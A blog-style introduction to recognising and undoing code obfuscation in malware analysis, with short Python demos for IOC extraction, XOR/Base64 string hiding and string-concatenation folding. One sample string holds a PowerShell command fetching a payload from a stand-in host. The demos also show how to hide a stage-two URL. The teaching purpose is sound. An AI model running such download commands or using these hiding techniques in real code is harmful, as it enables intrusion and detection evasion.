Reverse Engineering - Understanding Code Obfuscation
This post reflects my interest in malware analysis techniques. It should be considered a "work in progress" rather than a full-blown tutorial or walkthrough, so content may be added or removed.
What is obfuscation?
Obfuscation is defined as "the action of making something obscure, unclear or unintelligible". In malware, it is a technique in which authors attempt to hide the intended functionality of their program. It is primarily used to slow down your analysis, for example by hiding strings and functions.
Learning to defeat obfuscation: Three key areas:
1 - Identify Obfuscation - recognise the signs of obfuscation - this will help us further down the line when doing the analysis.
2 - Defeat Obfuscation - knowing the steps necessary to bypass or eliminate obfuscation.
3 - Deeper Analysis - by understanding how to identify and defeat obfuscation, we can do a deeper dive and analysis. This will allow us to identify key indicators of compromise (IOCs) or indicators of attack (IOAs). We can then look across the network to see if any of the IOCs exist on other machines.
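To make the third point a little more concrete, here is a minimal sketch of pulling candidate IOCs out of text that has already been de-obfuscated. The function name `extract_iocs`, the regular expressions and the sample string are all my own assumptions for illustration (the sample uses reserved documentation values, not real indicators). The patterns are deliberately simple and will miss or over-match in real samples.

```python
import re

# Simplified patterns for illustration only; real-world IOC extraction needs
# stricter validation (for example, octet ranges and defanged indicators).
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_iocs(text):
    """Return the unique URLs and IPv4-looking strings found in text."""
    return {
        "urls": sorted(set(URL_RE.findall(text))),
        "ipv4": sorted(set(IPV4_RE.findall(text))),
    }


# Hypothetical de-obfuscated script content (example.test and 192.0.2.10
# are reserved documentation values, not real indicators).
sample = 'cmd = "powershell -c iwr http://example.test/payload.bin"; c2 = "192.0.2.10"'
iocs = extract_iocs(sample)
print(iocs)
```

The resulting lists are the kind of values you could then search for in proxy or endpoint logs on other machines.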
Why obfuscate?
Not all obfuscation is malicious. Legitimate software also uses it to slow down analysis and reverse engineering efforts, and many commercial offerings exist for this purpose. However, it's important to remember that obfuscation is not 100% effective: eventually the program needs to de-obfuscate its code in order to execute.
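The point that a program must eventually undo its own obfuscation can be illustrated with a small sketch. It assumes a hypothetical scheme (single-byte XOR followed by Base64) and a made-up key and URL; real samples use many different encodings, but the principle is the same: the decoder ships with the program, so an analyst can run or reimplement it.

```python
import base64

KEY = 0x5A  # hypothetical single-byte XOR key


def encode(plain):
    """What the author does before shipping: XOR each byte, then Base64."""
    xored = bytes(b ^ KEY for b in plain.encode("utf-8"))
    return base64.b64encode(xored).decode("ascii")


def decode(blob):
    """What the program must do at run time before it can use the string."""
    xored = base64.b64decode(blob)
    return bytes(b ^ KEY for b in xored).decode("utf-8")


hidden = encode("http://example.test/stage2")
print(hidden)          # unreadable at rest
print(decode(hidden))  # recovered by running the program's own decoder
```

A strings search over the stored form would not show the URL, but the value is fully recoverable once the decode routine has been identified.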
How does code obfuscation impact your analysis?
1- Slow down analysis and reverse engineering.
2- Hide intended functionality - strings and function calls.
3- Obtain resilience in malicious campaigns.
In Interpreted Code you should expect to find the following:
- Nonsensical variables/functions - used to throw off signature detection and make it harder to trace functions through the program.
- Unnecessary instructions - instructions that have no impact or functionality, such as 'for' loops or string concatenation. They essentially do nothing and are only in place to slow you down and make the code look more complicated than it actually is.
- String manipulation - a common technique in interpreted code, where strings are split, encoded or otherwise rearranged. The code still needs to be de-obfuscated at some point in order to run.
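The three signs above can be seen together in a toy example. This is a harmless sketch I wrote for illustration, not taken from any real sample: `xQ9_zz` is a made-up nonsensical name, and `greet` is what the same function looks like once the noise is removed.

```python
def xQ9_zz(a1):
    # Dead loop: the result is never used.
    q = 0
    for i in range(50):
        q = (q + i) % 7
    # String built from fragments to avoid a readable literal.
    s = "he" + "l" + "lo" + ", "
    # Pointless arithmetic that always evaluates to zero.
    n = (len(a1) * 2) - (len(a1) + len(a1))
    return s + a1[n:]


def greet(name):
    """The same behaviour once the noise is stripped away."""
    return "hello, " + name


# Both versions produce the same result for the same input.
assert xQ9_zz("analyst") == greet("analyst")
print(xQ9_zz("analyst"))
```

Working out which lines actually contribute to the return value is most of the job; everything else can be ignored.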
In Native Code, it can be more difficult to identify code obfuscation techniques.
- Unnecessary instructions and API calls.
- Confusing logic and control flow - for example, calling an unnecessary API and then testing the result of the API using the eax register.
- Obfuscated and/or meaningless strings - again to try and throw you off the scent of what the malware is actually trying to do.
Common Obfuscation Techniques
- Adding unnecessary instructions: this can include things such as basic arithmetic, loops, object creation, and defining and calling functions that aren't actually needed.
- Obfuscating strings: Strings are an important source of information about what the macros will do; hiding them makes it more difficult to trace functionality.
- Obfuscating objects: Identifying objects is also important, as they are used to write to the underlying file system, execute commands and download content from the Internet.
- Nonsensical naming: Very prevalent. The use of confusing or randomly generated names also makes it more difficult to trace functionality and the flow of the program.
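As one example of defeating the string technique above, concatenated string fragments can be folded back together automatically. The sketch below works on Python source using the standard `ast` module, purely for illustration; the class name `FoldStringConcat`, the helper `fold_strings` and the sample line are my own assumptions. A macro or script in another language would need its own parser, but the idea carries over. Note that the input is only parsed and rewritten, never executed.

```python
import ast


class FoldStringConcat(ast.NodeTransformer):
    """Collapse "a" + "b" into "ab" wherever both sides are string literals."""

    def visit_BinOp(self, node):
        self.generic_visit(node)  # fold children first (bottom-up)
        if (
            isinstance(node.op, ast.Add)
            and isinstance(node.left, ast.Constant)
            and isinstance(node.right, ast.Constant)
            and isinstance(node.left.value, str)
            and isinstance(node.right.value, str)
        ):
            folded_value = node.left.value + node.right.value
            return ast.copy_location(ast.Constant(value=folded_value), node)
        return node


def fold_strings(source):
    """Parse source, fold literal string concatenations, return new source."""
    tree = FoldStringConcat().visit(ast.parse(source))
    ast.fix_missing_locations(tree)
    return ast.unparse(tree)  # requires Python 3.9+


# Hypothetical obfuscated line: an object name split into fragments.
obfuscated = 'target = "WScr" + "ipt.S" + "hell"'
folded = fold_strings(obfuscated)
print(folded)
```

This only handles literal-plus-literal concatenation; fragments hidden behind variables or function calls would need further passes.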
Prior to undertaking any analysis, an effective approach is required - you need to have an analysis objective before starting. This should be your primary goal and consideration so that you don't go down the rabbit hole.